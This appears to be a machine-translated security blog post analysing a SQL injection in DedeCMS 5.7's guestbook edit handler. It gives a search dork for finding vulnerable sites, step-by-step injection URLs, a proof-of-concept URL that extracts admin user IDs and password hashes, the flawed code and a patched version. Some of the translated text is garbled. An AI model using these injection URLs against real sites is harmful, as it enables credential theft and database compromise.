Catalog
1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking
1. Vulnerability description
The following conditions are required for successful injection of vulnerabilities
1. php magic_quotes_gpc=off2. The vulnerability file exists: plus/guestbook.php3. In the database: Dede_guestbook also needs to exist
Relevant Link:
inurl:/plus/guestbook.php
2. Vulnerability Trigger Condition
1. http//localhost/dedecms5.7/plus/guestbook.php2. The ID of the visitor's message can be found on [Reply/edit]. Then note the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=13. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc ' &id=14. After submission, if it is a dede5.7 version, it will appear"successfully change or reply to a message", it proves the change was successful.5. Back to: http://localhost/dedecms5.7/plus/guestbook.php, look at the change of the message whether the content has become errs.cc ' if so, it proves that the vulnerability could not be exploited should be opened for him: Php MAGIC_QUOTES_GPC =off6If no modification succeeds, the content of the message ID is still previous, which proves that the vulnerability can be exploited. 7. Then visit again: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg= ', Msg=user (), email= ' 8. Then return, the content of the message ID is directly modified to the MySQL user ().
relevant Link:
http://www.51php.com/dedecms/16942.htmlhttp://www.wooyun.org/bugs/ wooyun-2012-014501
3. Vulnerability Impact Range
0x1:poc
View Sourceprint? 1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=', [email Protected] ", msg= (SelecT CONCAT (userid,0x7c, pwd) from '%0,1) , email='
Relevant Link:
http://www.programgo.com/article/45492569994/http://www.cnblogs.com/Hkadmin/p/ 3712667.html
4. Vulnerability Code Analysis
/plus/guestbook.php
// Modify Message if ($action = ='admin') { include_once (dirname (__file__). ' /guestbook/edit.inc.php ' ); Exit ();}
\plus\guestbook\edit.inc.php
//instead of judging $g_isadmin, we mistakenly trust the user's input: action = "Admin"Else if($job = ='Editok') {$remsg=trim ($remsg); //There is no filter for $msg, which can be injected arbitrarily$dsql->executenonequery ("Update ' #@__guestbook ' Set ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' where id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}
Relevant Link:
http://pannisec.diandian.com/?tag=sql%e6%b3%a8%e5%b0%84
5. Defense Methods
\plus\guestbook\edit.inc.php
Else if($job = ='Editok') {$remsg=trim ($remsg); /*Verify $g_isadmin*/ if($remsg! ="') { //Admin reply does not filter HTML if($g _isadmin) {$msg="<div class=\\ ' rebox\\ ' >". $msg."</div>\n". $remsg; //$remsg <br><font color=red> Admin reply:</font> } Else{$row= $dsql->getone ("SELECT msg from ' #@__guestbook ' WHERE id= ' $id '"); $oldmsg="<div class=\\ ' rebox\\ ' >". addslashes ($row ['msg'])."</div>\n"; $remsg= Trimmsg (CN_SUBSTRR ($remsg,1024x768),1); $msg=$oldmsg. $remsg; } } /* */ /*effective filtering of the $msg*/$msg=addslashes ($msg); /* */$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' WHERE id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php